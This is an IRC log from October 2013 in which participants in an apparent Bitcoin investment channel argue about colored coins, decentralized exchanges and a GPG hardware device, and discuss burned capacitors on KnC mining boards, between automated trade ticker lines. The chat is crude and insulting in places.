merged mining! Oct 10 05:16:23 separate blockchain would be vulnerable to 51% attacks Oct 10 05:16:24 well, ok, you have to add incentives to merge mine it Oct 10 05:16:34 but let's say i own 100 shares in company x Oct 10 05:16:42 le nuage Oct 10 05:17:01 why can't i just send pankkake a dust transaction with "xfer 100 S.GEM" in the note field? Oct 10 05:17:05 nubbins` because idiots. Oct 10 05:17:19 see also Oct 10 05:17:22 ;;google why i nixed Oct 10 05:17:22 i mean, if the idea behind colored coins is that you have to make this huge tree of transactions that have some sort of magic dust in them Oct 10 05:17:23 nixed - definition of nixed by the Free Online Dictionary, Thesaurus ...: ; Why I nixed p2p, colored coins and all that jazz pe Trilema - Un blog ...: ; Why I Nixed the Knicks | The New York Observer: Oct 10 05:17:40 why not tie the shares to the address, not to any particular coins? Oct 10 05:18:24 i send a dust tx to address 1abc, with note "xfer 100 s.gem", so address 1abc is assumed to always possess those 100 shares, permanently Oct 10 05:18:26 no losing them Oct 10 05:18:50 until they send a dust tx to someone else saying xfer 50 s.gem or whatever Oct 10 05:19:10 from what I understand, colored coins aren't much better than asicminer-style direct shares Oct 10 05:19:14 tying assets to individual coins and not addresses doesn't make any sense Oct 10 05:19:42 the only thing direct shares need is a way to post bids and asks Oct 10 05:19:54 without relying on a website Oct 10 05:21:30 because the handkling of fixed addresses is poorly understood because, again, idiots. Oct 10 05:22:43 I'm still waiting for any technical insight on colored coins, so far I only see circlejerks (like the reddit shirt fundraiser) Oct 10 05:22:59 nothing that couldn't be trivially implemented in any desktop or web-based bitcoin client Oct 10 05:23:21 another tab next to "receive money" on your blockchain.info account Oct 10 05:24:52 nubbins` here's the thing : if you do it with addresses you don't really need the blockchain, might as well do it to gpg signatures. Oct 10 05:25:06 which reduces to a slightly braindamaged reimplementation of mpex. Oct 10 05:26:04 mpex servers melt tomorrow, no trading; i can still send a dust tx to transfer my colored address shares Oct 10 05:26:49 you got a dude with an ak guarding your private key? Oct 10 05:27:00 i'm assuming you keep records of who owns what? suppose you didn't have to Oct 10 05:27:04 Vexual: don't we all? Oct 10 05:27:22 few do Oct 10 05:27:45 nubbins` you can, but you have an escrow problem each time you do. Oct 10 05:28:22 escrow is a problem? Oct 10 05:28:32 yes, escrow is a problem. Oct 10 05:29:24 multi-sig transactions Oct 10 05:29:55 [HAVELOCK] [AM100] 58 @ 0.009 = 0.522 BTC [+] Oct 10 05:30:02 multi-sig txs are not a solution to the escrow problem really. Oct 10 05:30:05 og blockchain is the gold standard, accept no substitutes Oct 10 05:30:29 they;'re a useful tool in some contexts, but you still need to have an escrow agent Oct 10 05:30:34 if that agent melts down... no transactions. Oct 10 05:30:43 which brings you back to exactly where we started. Oct 10 05:31:16 whats the point? Oct 10 05:31:16 if the transacting parties agree, there's no need for the escrow agent at all, but you're correct in that the system would hinge on having a supply of readily-available escrow agents Oct 10 05:31:37 yeah. Oct 10 05:31:46 although Oct 10 05:31:58 it's trivial to verify a legit tx Oct 10 05:32:12 depends on the state of the blockchain at that time Oct 10 05:32:17 if it's forked, it may be impossible. Oct 10 05:32:36 well, if it's forked, lots of things are impossible Oct 10 05:32:40 not for mpex. Oct 10 05:33:01 moreover, you will have a sensible delay in all trades. what's better, one day a year of no trading or half hour lost to settle each individual trade ? Oct 10 05:33:46 hm Oct 10 05:35:02 today is like design 101 day Oct 10 05:35:49 got a logo yet? Oct 10 05:35:50 from what I see, this is going the way of the decentralized facebook Oct 10 05:36:09 y'know, i think everything but the delay could be worked around Oct 10 05:36:09 just about. decentralised trust is about as clever as decentralised cunt. Oct 10 05:36:13 you got nothing to rub against. Oct 10 05:36:36 in unrelated news, http://dfw.cbslocal.com/2013/10/08/are-anti-bullying-programs-having-an-opposite-effect/ Oct 10 05:36:53 are anti-whatever programs having an opposite effect? yes Oct 10 05:38:01 Vexual logo for what you mean ? Oct 10 05:38:08 colored coins? Oct 10 05:38:16 it's the first step to any successful project! Oct 10 05:38:25 the logo looks horrible in my head Oct 10 05:38:38 nothing to rub against, that bests beans in the sausage soup Oct 10 05:38:44 lmao Oct 10 05:39:04 [HAVELOCK] [B] [XBOND] 600 @ 0.00123997 = 0.744 BTC [+] {3} Oct 10 05:39:08 LOL: oops! http://www.washingtonpost.com/blogs/worldviews/wp/2013/10/09/oops-azerbaijan-released-election-results-before-voting-had-even-started/ Oct 10 05:39:15 http://mpex.co/favicon.ico even MPEx has a logo! Oct 10 05:41:20 http://bitcoin-assets.com/static/mpex-248x50.png eh, still horrible Oct 10 05:42:29 i mean logo for beardy italian gpg stick Oct 10 05:42:35 <[\\\]> people still use favicon? Oct 10 05:42:43 faviconcoin Oct 10 05:42:52 why wouldn't you have favicons? Oct 10 05:43:12 having no favicon implies boorishness Oct 10 05:56:57 if i may suggest, a bearded italian Oct 10 05:57:33 im pretty sure theres no copywrite on those images Oct 10 05:58:32 which ? Oct 10 06:00:18 the name of the guy, who your gpg key is named after, whos name i forget becuase i didn't know of him before Oct 10 06:00:41 Vexual: he is also known for inventing... the crankshaft. Oct 10 06:00:48 really? Oct 10 06:01:04 i must have really skimmed wikipedia that time Oct 10 06:01:23 i have no idea what's going on... Oct 10 06:01:38 well, the modern version thereof Oct 10 06:02:42 whats the name again? Oct 10 06:02:56 err, not the crankshaft, the gimbal shaft Oct 10 06:03:06 as in this one - http://en.wikipedia.org/wiki/Universal_joint Oct 10 06:03:20 like some trustless gyroscope Oct 10 06:04:28 [HAVELOCK] [AM1] 1 @ 1 BTC [+] Oct 10 06:04:34 o you mean the cardan joint ? Oct 10 06:04:39 right Oct 10 06:05:02 but I first learned of him because of 'Cardano's Grille' Oct 10 06:05:22 possibly the most fun low-tech cipher machine possible Oct 10 06:06:01 which suggests a great line to me : whenever someone wants to featurecreep me, i shall go "we're doing a cardan joint not a thomson coupling here" Oct 10 06:06:27 you know rastas replace the word vital with ital Oct 10 06:07:03 and italians improved had made hash production in the himilayas Oct 10 06:07:16 they are very good at first principals Oct 10 06:07:36 the obsolete crypto method in question: http://en.wikipedia.org/wiki/Cardan_grille Oct 10 06:07:55 who knew it was on pediwikia Oct 10 06:09:03 a beautiful culture in tune with an old language, great for thought Oct 10 06:11:58 “Are you a federal employee that has been deemed non-essential? Do you have a little too much time on your hands and nothing to do? Is the recent government shutdown to blame? Here at Vibrators.com we are committed to allowing our customers to find satisfaction. As vibrator enthusiasts, we want everyone to experience the pleasure that a nice vibrator can bring to partners and individuals. Besides, we know you have s Oct 10 06:11:58 ome free time, why not try something new? Vibrators.com has been giving away this free vibrator for years as a bonus gift with customers’ orders and it receives great reviews. It is fairly powerful, quiet, and uses a single AA battery (not included). It is 5 inches long and 1 inch in diameter, a smaller vibe. It is emblazoned with the Vibrators.com logo on one side, so that you will forever remember our generosity.” Oct 10 06:14:29 i remember something an old italian man told me, ingenious, i have to poke it in with a stick Oct 10 06:23:59 its probaly funnier when you've seen his wife Oct 10 06:24:46 gimbal joint built into the stick, or the wife? Oct 10 06:25:41 whats latin for gspot? Oct 10 06:26:30 punto g ? **** BEGIN LOGGING AT Thu Oct 10 14:43:03 2013 Oct 10 14:55:16 [HAVELOCK] [HIM] 8 @ 0.1001375 = 0.8011 BTC [-] {2} Oct 10 15:00:21 [HAVELOCK] [XBOND] [PAID] 0.69348300 BTC to 1`386`966 shares, 50 satoshi per share Oct 10 15:01:27 http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html Oct 10 15:01:31 shit one learns from one's blog. Oct 10 15:02:55 yo Oct 10 15:03:02 ello. Oct 10 15:03:18 so i was reading your reply Oct 10 15:03:49 i concur when you say the fact the private key is never exported is a feature Oct 10 15:03:51 "and i hate you now" Oct 10 15:03:53 a ok Oct 10 15:04:09 nah, i never hate :-) Oct 10 15:04:21 but regarding the revocation cert it's still useful to have Oct 10 15:04:35 push it to keyservers, everybody gets notified Oct 10 15:04:58 maybe. the one constraint in there, you have to appreciate, is that since we're not doing asics for this, Oct 10 15:05:03 there's just so much space available for code Oct 10 15:05:12 so iot's a game of well what can we fit of what we need to have Oct 10 15:05:20 ofc Oct 10 15:05:51 if we ever end up selling these by the 10's of ks then an asic run becomes more reasonable and it probably will present a muchly different picture Oct 10 15:05:59 i'm just saying you're forgetting the main point of the revocation cert (in this specific context) in your answer Oct 10 15:06:16 well, see, the cardano is principally to be used with people you are in contact with. Oct 10 15:07:25 it's ideal usecase is not this, post pubkey on your blog, 20 years later still get encrypted email to that key (you've long lost) Oct 10 15:08:05 hmm Oct 10 15:08:47 lermme quote here Oct 10 15:13:00 well i can't find it. somewhere phil zimmermann was saying that people still send him pgp encrypted email but he long since doesn't have the key so he usually responds to ask ppl to send it plainly Oct 10 15:13:07 which he figures they might think it's a little strange. Oct 10 15:13:30 anyway. that sort of thing isn't the usecase here, not really. a classic pc implementation works much better. Oct 10 15:17:16 yeah so it isn't really supposed to be "The safe vault for your precious keys"(TM) Oct 10 15:17:22 i see Oct 10 15:17:47 nah, it's supposed to be the unbreakable instagpg item. Oct 10 15:17:59 the mothership probably needs a different solution. this is what the xwingers use while in flight Oct 10 15:25:35 i'm off, gonna build my mini GPG keychain with a raspberry pi and a betamax casing Oct 10 15:29:51 [MPEX] [S.MPOE] 3200 @ 0.00085224 = 2.7272 BTC [+] Oct 10 15:36:33 Matthew Green seems a good candidate to review the entropy of Cardano? Oct 10 15:39:55 bitesak sure, if he wants to Oct 10 15:40:05 davout lol Oct 10 15:44:25 well that script didn't work Oct 10 15:58:18 [HAVELOCK] [AM1] 3 @ 1 = 3 BTC [+] Oct 10 15:59:19 [MPEX] [S.MPOE] 1550 @ 0.00085105 = 1.3191 BTC [-] Oct 10 16:13:01 lol Oct 10 16:18:38 [HAVELOCK] [AM100] 140 @ 0.00998569 = 1.398 BTC [+] {5} Oct 10 16:19:39 [HAVELOCK] [AM100] 37 @ 0.00998799 = 0.3696 BTC [+] Oct 10 16:20:40 [HAVELOCK] [AM1] 4 @ 1.05624924 = 4.225 BTC [+] {3} Oct 10 16:21:41 [HAVELOCK] [AM1] 1 @ 1.06499999 BTC [+] Oct 10 16:36:56 [HAVELOCK] [AM100] 20 @ 0.00900001 = 0.18 BTC [-] {2} Oct 10 16:37:34 clear Oct 10 16:37:38 whoops Oct 10 16:43:02 http://usgovdownforeveryoneorjustme.com/ Oct 10 16:43:17 lol Oct 10 16:44:13 nice Oct 10 16:47:06 [MPEX] [S.MPOE] 3219 @ 0.00085602 = 2.7555 BTC [+] {3} Oct 10 16:48:51 hi davout, how long should the b-c verfication take? Oct 10 16:49:17 i'm waiting almost a week Oct 10 16:51:22 our financial partner is really slow Oct 10 16:51:55 who you working with ? i forget Oct 10 16:52:11 they're called lemon way Oct 10 16:52:39 i'm not sure they know about the lemon party Oct 10 16:53:58 youi mean the start-up ?! Oct 10 16:54:23 the "your phone # is your acct #" folks ? Oct 10 16:54:42 lol yeah Oct 10 16:54:51 yes you do Oct 10 16:54:57 jeez. well this won't last long. Oct 10 16:55:11 why is that ? Oct 10 16:55:21 cause clueless imo. Oct 10 16:56:12 let's say that they understand fast, but you gotta speak slowly Oct 10 16:56:31 heh. anyone ELSE work there outside of that burlet fellow ? Oct 10 16:57:28 yup, witnessed it first hand Oct 10 16:57:32 you know him? Oct 10 16:57:37 not personally Oct 10 16:58:08 well, don't go out of your way Oct 10 16:58:33 lol. im sorry, but i have to rely on reams of intel. i can't personalyl know everyone. Oct 10 16:58:45 anyway. mebbe it works out for you, but i'd keep on toes. Oct 10 17:02:46 http://www.forbes.com/sites/ryanmac/2013/10/09/living-with-ross-ulbricht-housemates-say-they-saw-no-clues-of-silk-road-or-the-dread-pirate-roberts/ Oct 10 17:04:18 "kept to himself and spent full days buried in his laptop." Oct 10 17:04:32 dude... kids today. long time on a laptop is fucking egonomics suicide. Oct 10 17:04:34 why. why do they do it. Oct 10 17:05:25 is there anything else to do? Oct 10 17:05:36 use a desktop! Oct 10 17:05:53 touche Oct 10 17:06:45 egonomics, invented by mpex Oct 10 17:06:49 i suspect it's quite possible none of the recent kids ever got to use desktops and simply don't know the glory of comfort. Oct 10 17:06:54 ThickAsThieves lol Oct 10 17:07:29 might be a good name for the blog Oct 10 17:07:54 i meant ergonomics! i swear! Oct 10 17:08:23 popescuian slip Oct 10 17:08:27 [MPEX] [S.MPOE] 5543 @ 0.00085746 = 4.7529 BTC [+] Oct 10 17:08:27 [HAVELOCK] [AM100] 41 @ 0.009001 = 0.369 BTC [+] {2} Oct 10 17:09:22 i suppose i'll have to write the book now. Oct 10 17:09:28 [HAVELOCK] [AM100] 21 @ 0.00900001 = 0.189 BTC [-] Oct 10 17:09:44 lol: https://bitcointalk.org/index.php?topic=308861.msg1521109;topicseen#new Oct 10 17:09:49 "You are already rich god damn it." Oct 10 17:10:15 what the world needs now, BTCT code open-sourced... Oct 10 17:10:42 burnside's not sure if he can reliably wipe all passwords Oct 10 17:11:18 ? Oct 10 17:11:29 remember bitcoinica? Oct 10 17:11:34 before my time Oct 10 17:11:44 "i suspect it's quite possible none of the recent kids ever got to use desktops and simply don't know the glory of comfort." yup Oct 10 17:11:49 they do learn, though. in pain Oct 10 17:11:58 ftfy: in vain Oct 10 17:12:07 maybe that;s why they are such jerks Oct 10 17:12:45 all this decntralized exchange talk is driving me batty Oct 10 17:13:03 i started actually responding and making points, but it doesn't help of course Oct 10 17:13:16 "Direct shares is the only way forward, at this point. The fact that you have not put together a direct share system shows the short-sightedness of management." Oct 10 17:13:21 ThickAsThieves: https://bitcointalk.org/index.php?topic=93074 Oct 10 17:13:25 the other response could be "shut up and code" Oct 10 17:13:36 instead of circlejerking on how colored coins are the future Oct 10 17:13:40 or, Fuck you. Oct 10 17:14:26 lastpass, lol Oct 10 17:15:16 "I'm posting my idea here since it hasn't gotten much attention in the Project Development forum (0 replies)" Oct 10 17:15:51 mp, please write a Here's Why Everyone That Wants Decentralized Exchanges is Moron post Oct 10 17:16:11 assuming you havent already Oct 10 17:17:13 there was kinda such discussion with asciilifeform's proposal on this topic Oct 10 17:17:30 clear Oct 10 17:18:53 davout ? Oct 10 17:19:25 prepping the defibrillator? Oct 10 17:19:28 flatline Oct 10 17:20:57 skinnkavaj hasa a very interesting take on the world :D Oct 10 17:21:35 mircea_popescu: What? Oct 10 17:21:40 ThickAsThieves the relevant bit there is, after the third time bitcoinica was raped, the "bitcoin consultancy" group of dorks self proclaimed into importance & relevance decided to shut it down. Oct 10 17:21:53 after which one of them, the fabled amir taaki, stole the code and published it Oct 10 17:21:56 yes, a decentralized stock exchange would be wonderful, wouldn't it Oct 10 17:22:02 in what his foggy brain represented as "open sourcing", Oct 10 17:22:20 supposedly if you torrent some movie you're also open sourcing it, cause you don't need a license in the first place to cede rights. Oct 10 17:22:22 mircea_popescu: Did you respond to my comment i just made in neobee thread? Oct 10 17:22:25 and why are they morons? oh becauseyou area fascist Oct 10 17:22:32 yes, bet you love Heinlein also Oct 10 17:22:33 anyway. the code contained a lot of good bits including enough info to reconstruct a pw. Oct 10 17:22:39 which resulted in some [more] lost btc. Oct 10 17:22:55 skinnkavaj no it was about the btctc "you're already rich" thing Oct 10 17:23:35 mircea_popescu: Isn't it true? Oct 10 17:23:39 Does burnside need the money? Oct 10 17:23:43 no, it's not true. Oct 10 17:23:56 burnside is poor now, for one. his btct never made anything for the mention, for the other. Oct 10 17:24:15 mircea_popescu: Didn't both litecoinglobal and btct have very huge fees? Oct 10 17:24:17 moreover, poor idiots should not have access to code that SEEMS like it's doing something of that nature. Oct 10 17:24:23 because they'll just fuck their lives up. Oct 10 17:24:29 Ofc burnside is rich. Oct 10 17:24:36 skinnkavaj they had very huge fees. he is not rich. go figure. Oct 10 17:24:45 ThickAsThieves: http://trilema.com/2013/why-i-nixed-p2p-colored-coins-and-all-that-jazz/ Oct 10 17:24:46 and this is not abut burnside. now there's at least some technical barrier to keep your average noob/scammer to start his own exchange Oct 10 17:24:53 ^ Oct 10 17:25:04 jurov: Yeah like a free market hurts Oct 10 17:25:05 to start his own WEBSITE which he misrepresents as an exchange. Oct 10 17:25:05 LOL Oct 10 17:25:08 and you are into bitcoin Oct 10 17:25:16 because its sold to a company? Oct 10 17:25:18 a collectiojn of idiots being confused about what they do != a free market. Oct 10 17:25:55 So your argument is like, with open source everything that comes out is just crap? Oct 10 17:26:09 "LorenzoMoney> yes, bet you love Heinlein also" wat Oct 10 17:26:09 no. Oct 10 17:26:09 And you are using bitcoin Oct 10 17:26:14 Lmao Oct 10 17:26:34 Maybe we should sell bitcoin to a company Oct 10 17:26:38 my argument is that you are ill equipped to consider things, as displayed by the very dubious generalisation you just tripped yourself with. Oct 10 17:26:38 Genius Oct 10 17:28:36 skinnkavaj: i have seen myself some offers on freelancer "build me a bitcoin exchange", they were obviously clueless on first read Oct 10 17:28:57 it's just better for everyone if they don't Oct 10 17:29:31 mp your colored coins article doesnt address many other problems Oct 10 17:29:37 So what? With a free markey, people will choose where to go. Which one sets up the best BTCT clone will win in the end. Oct 10 17:29:42 ThickAsThieves so point them out. Oct 10 17:30:23 anyway, " burnside's not sure if he can reliably wipe all passwords" << no, just not sure how to cleanly remove the "give scammers fake btc to fake their volume" code. Oct 10 17:30:46 the argument of course shifts depending on what problem it is people are trying to solve with decentralization Oct 10 17:30:46 skinnkavaj: nope. the one who will manage to keep the bitcoins safe will win Oct 10 17:31:06 of course. Oct 10 17:31:07 jurov: Exactly what i said but in other words Oct 10 17:31:09 your points are mostly technical, involving the blockchain as being impractical Oct 10 17:31:20 i'd argue the concept itself is a unicorn Oct 10 17:31:22 skinnkavaj no, not exacvtly what you said at all. Oct 10 17:31:33 forum retards move to what SEEMS TO THEM a better alternative. Oct 10 17:31:37 then they lose their btc. Oct 10 17:31:44 which is ok because new retards come in. Oct 10 17:31:57 powers will always become ordered, dismantled, ordered, etc Oct 10 17:31:57 if this process is allowed to become "what Bitcoin is" then Bitcoin will never be anything. Oct 10 17:31:59 No, people use the service because its good. Thats the free market. Do you realize why everyone is abonding mtgox? Oct 10 17:32:12 and a bunch of rich powerful people are here to fuck you in the mouth until you bleed Oct 10 17:32:16 rather than let that happen. Oct 10 17:32:27 i dunno how it can be made clearer. "free market" indeed. Oct 10 17:32:34 i see another conversation is happening sorry Oct 10 17:32:57 ThickAsThieves no, im done with the "free market of retards" concept. anyway, re the colored coins : Oct 10 17:33:05 the blockchain is fundamentally a solution to the bizantine problem Oct 10 17:33:33 that problem exists like gravity exists. if you have it you gotta solve it. which is why the article focuses on the blockchain : if you're doing distributed anything, you have the bizantine poblem. Oct 10 17:34:22 admittedly, it doesnt seem to be the colored coin style developers making wild claims, but the people flocking to these ideas Oct 10 17:34:27 what i mean is Oct 10 17:34:34 people see exchanges closing Oct 10 17:34:50 and that decentralized things are now a solution Oct 10 17:35:09 colored coin type developers are merely trying to make an accountable ledger Oct 10 17:35:15 these are not the same things Oct 10 17:35:51 explain the difference ? Oct 10 17:36:04 well the devs are just trying to make a thing Oct 10 17:36:05 i mean other than "Well different implementations of the same concept" Oct 10 17:36:20 while the cheerleaders are searching for a replacement for exchanges Oct 10 17:36:37 colored coins do not provide a solution for decentralized *trades* Oct 10 17:36:38 so you envisage a distributed replacement that's NOT at the same time an accountable ledger ? Oct 10 17:36:46 no Oct 10 17:36:52 i despise the whole idea Oct 10 17:36:58 not what i meant Oct 10 17:37:06 i meant as a pure concept. could such a thing be conceived Oct 10 17:37:34 i simply believe any such pursuit is a waste of time Oct 10 17:37:36 pankkake that's you know, like "cancer will get you" for the gunshot wound patient Oct 10 17:38:14 i see the securities market as an ideal system involving 4 major parties Oct 10 17:38:27 anyway. something like ripple (and tf's abuse thereof) clearly showed what the problems are with trying to get a distributed trust model going. Oct 10 17:38:50 the Exhange/Platform, Investment Bank/Issuer, Investor, and the issued Business/Financial Instrument Oct 10 17:38:56 [HAVELOCK] [AM100] 81 @ 0.00997734 = 0.8082 BTC [+] {3} Oct 10 17:39:00 having all 4 allows the alignment of interests Oct 10 17:39:08 and balance of power/trust Oct 10 17:39:28 this is at least the proven=to=work italian model the modern system is copying. Oct 10 17:39:32 and now i shall be off scarfing smoked salmon and fresh apple pie seasoned with free market tears. bbs. Oct 10 17:39:33 these powers are made useful/profitable/covenient in their vert centralization Oct 10 17:39:48 very* Oct 10 17:40:10 to attempt to "decentralize" merely amounts to breaking things into less useful pieces Oct 10 17:40:58 [HAVELOCK] [AM100] 19 @ 0.00997981 = 0.1896 BTC [+] Oct 10 17:41:09 thus all my problems with the decentralization of securities movement are conceptual Oct 10 17:41:10 I hereby decentralize ThickAsThieves Oct 10 17:41:17 you are now thick, and a thief Oct 10 17:41:21 lol Oct 10 17:41:59 [HAVELOCK] [AM100] 50 @ 0.00997981 = 0.499 BTC [+] {2} Oct 10 17:42:27 if you pile on mp's technical arguments about the blockchain's limits in providing a decentralized solution it only makes decentralization that much worse of a pursuit Oct 10 17:44:13 circling back to, i'd love to see blog article from mp that supported what ive just described Oct 10 17:44:30 although i guess no one would care much Oct 10 17:44:40 certainly not the forums Oct 10 17:45:25 "Such terms is rather ridicules and im sure they wont hold up in court in many country's" Oct 10 17:45:27 I'm not well versed in trade engines, but I don't see how you could execute them in a decentralized way Oct 10 17:45:43 even with only trusted nodes Oct 10 17:45:53 execute trades* Oct 10 17:46:04 i'm not inclined to find out :) Oct 10 17:47:17 another area people think decentralization addresses is circumventing SEC and other regulation Oct 10 17:47:33 this might be possible for nondescript financial instruments Oct 10 17:47:44 but not actual shares in companies Oct 10 17:47:57 unless the company is a scam, then it can work :) Oct 10 17:48:01 true Oct 10 17:59:06 i dont undersstand, how it can work? i mean, how it protects said comapny from SEC? Oct 10 17:59:45 it doesnt Oct 10 17:59:49 thats the point Oct 10 18:00:05 pankkake it's a hell of a problem. Oct 10 18:00:12 so to what you said "true" then? i'm confused Oct 10 18:00:23 scammers would be safe Oct 10 18:00:33 since they would never say who they really are Oct 10 18:00:48 thus a decntralized service would make their lives easier Oct 10 18:01:51 ;;google "a company for carrying out an undertaking of great advantage, but nobody to know what it is" Oct 10 18:01:53 South Sea Company - Wikipedia, the free encyclopedia: ; Mackay, Charles, Memoirs of Extraordinary Popular Delusions and ...: ; The Extraordinary Popular Delusion of Believing What You Read ...: it's not a normal word? Oct 10 18:04:03 no its not, especially if used like: unless the company is a scam, then it can work Oct 10 18:04:34 i understood it the opposite way Oct 10 18:04:59 like "if the company is a scam, then it can work" Oct 10 18:05:11 thats correct intepretation Oct 10 18:05:14 r Oct 10 18:05:15 er... i mean.. fuck it Oct 10 18:05:18 hehe Oct 10 18:06:35 maybe it's just perl-induced braindamage Oct 10 18:08:31 "I think decentralized is the only way to go as this will happen to any other centralized exchange. Looking into the Namecoin code to create a decentralized exchanged. As was said above it can be merged mined with Bitcoin. We could uses our own miners to get it going." Ken Slaughter Oct 10 18:12:13 rather than getting some pmbs that don't melt. Oct 10 18:12:32 because everyone gains when nobody does his job well because he's too busy trying to do poorly the jobs of others. Oct 10 18:12:42 fucking garzik syndrome. Oct 10 18:32:38 http://trilema.com/2013/and-now-i-shall-be-off-scarfing-smoked-salmon-and-fresh-apple-pie-seasoned-with-free-market-tears-or-why-a-collection-of-confused-retards-does-not-amount-to-a-free-market/ Oct 10 19:03:28 If shares were issued on their own blockchain and could be freely moved between the various available trading sites / 'share wallets' there would be no real difference in trading a share to trading an altcoin. Something like this would provide no decentralised exchange but it provides a way to hold and move shares independently of any trading platform. Just like Bitcoin. Oct 10 19:05:52 Who would approve- dissaprove securities - The only person I have seen competent in theis matter already has an exchange Oct 10 19:07:29 and do not sat the commnity, because a group of retards approving something is still a group of retards making a decision Oct 10 19:11:03 If anyone can create a security then I don't see the big deal. The approval process would happen automatically if people started trading them for Bitcoin. Take these new alt currencies which appear to be created daily - they're not all traded on exchanges hence they're not 'approved'. They still exist but that is irrelevant. Oct 10 19:12:02 I guess my take on it is the shares could do with decentralisation, not so much the exchanges. Oct 10 19:28:13 you'd prefer the stock market to more resemble the altcoin markert? Oct 10 19:28:50 wasnt it close enough already with labcoins and activeminingcoins Oct 10 19:29:04 lol Oct 10 19:29:09 Were those really things? Oct 10 19:29:26 they behaved much the same... Oct 10 19:29:51 lots of people focusing attention on them like a bitcoingem Oct 10 19:30:01 then bagholders left to be determined Oct 10 19:30:24 I admit that I, at one time or another, owned shares of both. Oct 10 19:30:25 hordes of ingoramuses asking what is a labcoin and how do i get them? Oct 10 19:30:41 anxious to hold their thread of the bag Oct 10 19:30:59 then poof the network disowns it Oct 10 19:31:08 threads unravel Oct 10 19:31:13 the bag is empty Oct 10 19:31:38 at least no one had to waste any GPU power Oct 10 19:31:49 It would be nice if we could withdraw shares from an exchange just like a coin. Oct 10 19:32:01 why Oct 10 19:32:30 It would end reliance on 'the exchange' so when it closes down they could be traded elsewhere. Oct 10 19:32:40 you rely on the issuer Oct 10 19:32:44 not the exchange Oct 10 19:32:49 the exchange is a platform Oct 10 19:33:30 just because you can "withdraw" your share, doesnt mean it will have usefulness in the same ways Oct 10 19:33:46 realize that in such a system you'd end up with more friction Oct 10 19:33:57 in time, in cost, etc Oct 10 19:34:24 me for example, you think i would manage a ledger system for free? Oct 10 19:34:53 [HAVELOCK] [AM100] 64 @ 0.00935 = 0.5984 BTC [-] Oct 10 19:35:13 even a decentralized system needs a point of issuance Oct 10 19:35:29 This is true, I'm not saying it's simple Oct 10 19:36:20 but you are saying you want it Oct 10 19:36:25 i'm saying you shouldnt Oct 10 19:36:49 professional service providers are useful Oct 10 19:36:56 anarchy is not Oct 10 19:37:41 I think it would be an evolution on current uses of blockchains without going down the whole coloured coins route Oct 10 19:38:06 there are still plenty other issues to address Oct 10 19:38:27 time is better spent pursuing running legitimate services Oct 10 19:38:32 imo at least Oct 10 19:45:45 basically the very primitive understanding of freedom has serious trouble coming to terms with the ancient procedure of labour division Oct 10 19:46:18 on the basis of this we could say "the community" is sometime between 12k and 7k BC Oct 10 19:49:07 [MPEX] [S.MPOE] 750 @ 0.00085423 = 0.6407 BTC [-] Oct 10 20:16:35 With respect to the capacitors, an investigation has been undertaken with Anotherhost.se, as they have suffered the issue with all their boards. Oct 10 20:16:54 KNC says all the caps blowing is due to the corsair ps Oct 10 20:16:58 all ?! Oct 10 20:17:02 wait a second. ALL ?! Oct 10 20:17:17 that is what it says Oct 10 20:17:39 It appears that a reasonable solution has been reached in that all the boards this has occurred to seem to have been used alongside the exact same PSU; The Corsair HX850.+ Oct 10 20:18:01 dude it's not the power get out. Oct 10 20:18:09 Basically there is an issue with excessive current being applied, after the PU cuts out and the device is turned back on, causing the cap to pop. Oct 10 20:18:13 if all the boards burn its not the capacitors, it's not the power, it's the board. Oct 10 20:18:29 I know, that is a bad diagnosis- it is just wrong Oct 10 20:19:15 hum Oct 10 20:19:29 but caps exploded / went on fire Oct 10 20:19:33 A better guess- they are drawing too much off the ps- it cuts off to protect itself and the caps pop Oct 10 20:19:35 not just poped Oct 10 20:19:53 one can overload cap for a short while Oct 10 20:20:10 that seems to me like something that happens while under load for some time Oct 10 20:20:38 it has been reported minutes after plugin Oct 10 20:20:51 kakobrekla the current theory i'm crediting is that the boards have bad metal masks in a spot, and it slowly melts the insulation Oct 10 20:20:54 after which it shorts. Oct 10 20:20:56 well minutes in an eternity for electricity Oct 10 20:21:19 that is a good theory mp Oct 10 20:21:39 [HAVELOCK] [NEOBEE] 164 @ 0.00259998 = 0.4264 BTC [-] Oct 10 20:21:39 it makes sense- the KNC theory is just flat out wrong Oct 10 20:22:18 jborkl originally it looked like caps just popped but the history since then does nto bear it out Oct 10 20:22:54 The heavy scorch marks some of the boards are showing indicates more than a cap also Oct 10 20:23:21 and moreover it seems the majority of people i showed the pics to say those aren't electrolytic but ceramic Oct 10 20:23:23 which don Oct 10 20:23:26 t pop that way Oct 10 20:23:41 [HAVELOCK] [AM1] 1 @ 1.04987999 BTC [-] Oct 10 20:24:01 alternative: solder bridge (short) under the smt ceramic cap. Oct 10 20:24:33 asciilifeform nah because burned boards w/o such bridge were seen Oct 10 20:24:49 EDIT: I should add that KnC are using Corsair V850s themselves, and haven't had an issue with any of them. That said apparently they almost supplied their entire hosting with the HX, but due to the HX being out of stock for the volume required, they bought the V850. Which in hindsight is a wonderful thing. Oct 10 20:24:58 I just saw that Oct 10 20:25:10 bridge (accidental short, glob of solder where it doesn't belong) would vaporize in this case Oct 10 20:26:00 so, the entire hosting is being blamed on Corsair Oct 10 20:26:43 asciilifeform vaporize is perhaps an overtstatement. Oct 10 20:29:47 [HAVELOCK] [NEOBEE] 217 @ 0.0026 = 0.5642 BTC [+] Oct 10 20:33:24 capacitors can't be damaged by having current applied "before they've discharged their load" Oct 10 20:33:33 heh, but I can Oct 10 20:34:45 lol the erotic capacitor theory. Oct 10 20:41:59 [HAVELOCK] [AM100] 15 @ 0.00935334 = 0.1403 BTC [-] {2} Oct 10 20:43:00 [HAVELOCK] [AM1] 1 @ 1.022 BTC [-] Oct 10 20:52:47 http://www.memecreator.org/static/images/memes/1833214.jpg Oct 10 21:19:10 Beautiful. Oct 10 21:24:34 kakobrekla http://bitbet.us/bet/548/ross-william-ulbricht-will-be-convicted-of-three/#c1587 Oct 10 21:25:33 dunno if serial but mkay Oct 10 21:26:14 super cereal! Oct 10 21:28:14 i need to find a way to avoid this happening for b4x, cause i know it is Oct 10 21:28:29 im more skeptical for bb sine theres all these odds in the air that you wont get your money back Oct 10 21:28:47 why's it a bad thing anyway ? Oct 10 21:28:56 why is it a good thing? Oct 10 21:29:10 more liability for nothing Oct 10 21:31:06 hm Oct 10 21:31:49 [HAVELOCK] [AM1] 2 @ 0.9601 = 1.9202 BTC [-] Oct 10 21:32:48 [HAVELOCK] [AM1] 1 @ 0.96 BTC [-] Oct 10 21:33:49 [HAVELOCK] [AM100] 66 @ 0.00899757 = 0.5938 BTC [-] {4} Oct 10 